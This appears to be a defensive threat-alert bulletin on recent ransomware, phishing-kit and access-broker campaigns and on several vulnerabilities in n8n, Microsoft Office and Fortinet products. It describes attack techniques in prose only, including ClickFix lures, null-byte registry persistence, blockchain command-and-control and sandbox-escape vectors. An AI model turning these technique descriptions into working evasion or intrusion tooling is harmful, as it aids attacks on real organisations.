Threat Alerts

The Interlock ransomware group continues targeting North American organizations through sophisticated multi-stage attacks. Unlike typical RaaS operations, this dedicated group develops custom malware and adapts techniques over time, demonstrating persistence through months-long intrusions that culminate in data theft and encryption.
Initial compromise occurs via MintLoader infections delivering NodeSnakeRAT through PowerShell download cradles. The malware establishes persistence using autorun entries and scheduled tasks with names mimicking legitimate Windows services. Attackers deploy multiple JavaScript-based RAT variants for command execution, SOCKS5 proxy capabilities, and system reconnaissance. After months of dormancy, operators escalate through ScreenConnect installation for GUI access, credential harvesting via custom browser infostealers, and lateral movement using valid domain accounts. The group employs a novel BYOVD tool called “Hotta Killer” that exploits CVE-2025-61155 (CVSS 5.5) in anti-cheat drivers to terminate security processes.
Ransomware deployment involves both Windows JavaScript variants and Linux ELF binaries targeting Nutanix hypervisors. The JavaScript ransomware uses hybrid AES-RSA encryption with partial file encryption for speed, while excluding critical system directories. Attackers exfiltrate over 250GB using AZcopy before large-scale deployment via PsExec commands across the domain.

A credential-harvesting campaign has been actively targeting Gmail and Microsoft 365 accounts using newly registered *.contractors domains and phishing pages powered by the Tycoon 2FA phishing kit. The operation represents a significant risk by combining MFA-aware credential theft with advanced evasion and anti-analysis techniques designed to bypass traditional detection controls. Its coordinated use of multiple domains and shared infrastructure highlights the maturity and persistence of modern phishing-as-a-service operations capable of scaling rapidly across organizations and individuals.

The campaign relies on tailored social engineering lures impersonating legitimate organizations and warning recipients of potential service disruption unless email verification is completed. Victims are directed to attacker-controlled URLs where their email addresses are embedded directly into personalized links, followed by a fake CAPTCHA page used as an intentional delay to defeat sandboxing and automated analysis. After passing this gate, targets encounter high-fidelity login pages with accurate branding, prefilled usernames, and multi-step authentication flows engineered to capture both credentials and MFA approvals. The underlying infrastructure actively detects analysis tools, debuggers, and sandbox environments, redirecting suspected analysis traffic to benign decoy pages instead of errors to evade detection and extend domain longevity. The consistent use of freshly registered domains, randomized subdomains, long URL paths, and synchronized registration timelines indicates a broader campaign footprint beyond the observed samples, underscoring the ongoing threat posed by sophisticated MFA-aware phishing frameworks.

Two critical sandbox escape vulnerabilities in the n8n workflow automation platform allow authenticated users to execute remote code on affected systems, bypassing safeguards designed to contain untrusted workflow logic and potentially leading to full host compromise. These sandbox escapes can expose sensitive credentials, APIs, and infrastructure from affected workflow engines.

The first vulnerability affects n8n’s JavaScript expression engine has been designated CVE-2026-1470 (CVSS 9.9), where flaws in expression sanitization enable attackers with workflow creation or editing permissions to escape the sandbox and execute arbitrary JavaScript on the host system [1]. The expression engine processes content within special blocks using a JavaScript Function constructor, relying on an AST-based sandbox to neutralize dangerous constructs, but a missed edge case in the outdated “with statement” allows attackers to bypass these protections.
A second vulnerability targets the Python Code node when configured in “Internal” execution mode, allowing authenticated users to bypass restrictions and run arbitrary code outside the sandbox . Tracked as CVE-2026-0863 (CVSS 8.5), this flaw particularly affects self-hosted enterprise deployments where internal execution mode is commonly used for performance and operational reasons.

TA584, a sophisticated Initial Access Broker linked to Russian cybercriminal networks, has dramatically escalated operations in 2025 with campaign volumes tripling from March to December. The group deploys new malware called Tsundere Bot alongside advanced stealth techniques.

TA584 employs ClickFix social engineering tactics, tricking victims into executing PowerShell commands through fake error messages and CAPTCHA pages. The attack chain begins with phishing emails impersonating healthcare facilities, government agencies, and business services, containing unique URLs with geofencing and IP filtering. Upon clicking, victims encounter fabricated error prompts instructing them to copy malicious commands into Windows Run dialogs. This executes PowerShell scripts that download Node.js and deploy either XWorm or Tsundere Bot malware. The group uses compromised sender accounts and rapidly rotates infrastructure, lures, and delivery methods to evade detection.

Tsundere Bot represents a significant evolution in the threat landscape, utilizing blockchain technology for command-and-control communications through Ethereum smart contracts. The malware requires Node.js installation and employs WebSocket connections for C2 communication while checking system locale to avoid CIS countries. TA584 maintains persistence through invisible Windows Registry keys created by inserting null-byte characters, making malicious entries undetectable to standard enumeration tools. The group’s modular approach fetches payloads dynamically from external servers, creating effectively fileless infections that survive system reboots and complicate remediation efforts.

A high-severity zero-day vulnerability in Microsoft Office, tracked as CVE-2026-21509 (CVSS 7.8), is being actively exploited in the wild, prompting Microsoft to release emergency security updates. The flaw allows attackers to bypass built-in security features by circumventing OLE mitigations that normally protect users from vulnerable COM/OLE controls. This vulnerability poses a significant risk to enterprise environments, as it enables attackers to abuse trusted Office functionality through malicious documents and undermines core protective mechanisms designed to prevent exploitation.

Exploitation requires threat actors to craft a malicious Office file and socially engineer victims into opening it, allowing the attacker to bypass security checks based on untrusted inputs. Users running Office 2021 and later versions receive protection through a service-side update that becomes effective after restarting Office applications, while organizations using Office 2016 and 2019 must manually apply patches or implement a registry-based mitigation to reduce exposure. Due to confirmed active exploitation, the vulnerability has been added to federal Known Exploited Vulnerabilities catalogs, requiring remediation by February 16, 2026. Although technical details of the in-the-wild attacks remain undisclosed, the enforced patching deadline and out-of-band response underscore the severity of this security feature bypass and its potential for widespread abuse across corporate environments.

A critical authentication bypass vulnerability, CVE-2026-24858(CVSS Score 9.8), was disclosed by Fortinet affecting multiple Fortinet products including FortiOS, FortiAnalyzer, FortiManager, and FortiProxy. The flaw enables an unauthenticated threat actor with a valid FortiCloud account and a registered device to authenticate into other organizations’ devices, provided FortiCloud SSO is enabled. This breaks tenant isolation and allows cross-account administrative access.

While FortiCloud SSO is disabled by default, it is automatically enabled during FortiCare registration unless explicitly turned off, creating a widespread and often unnoticed exposure. Successful exploitation grants attackers privileged management access to core security infrastructure, enabling long-term persistence, lateral movement, security control tampering, and potential downstream compromise of protected networks. Given confirmed in-the-wild exploitation and the critical nature of affected products (firewalls, management platforms, and proxies).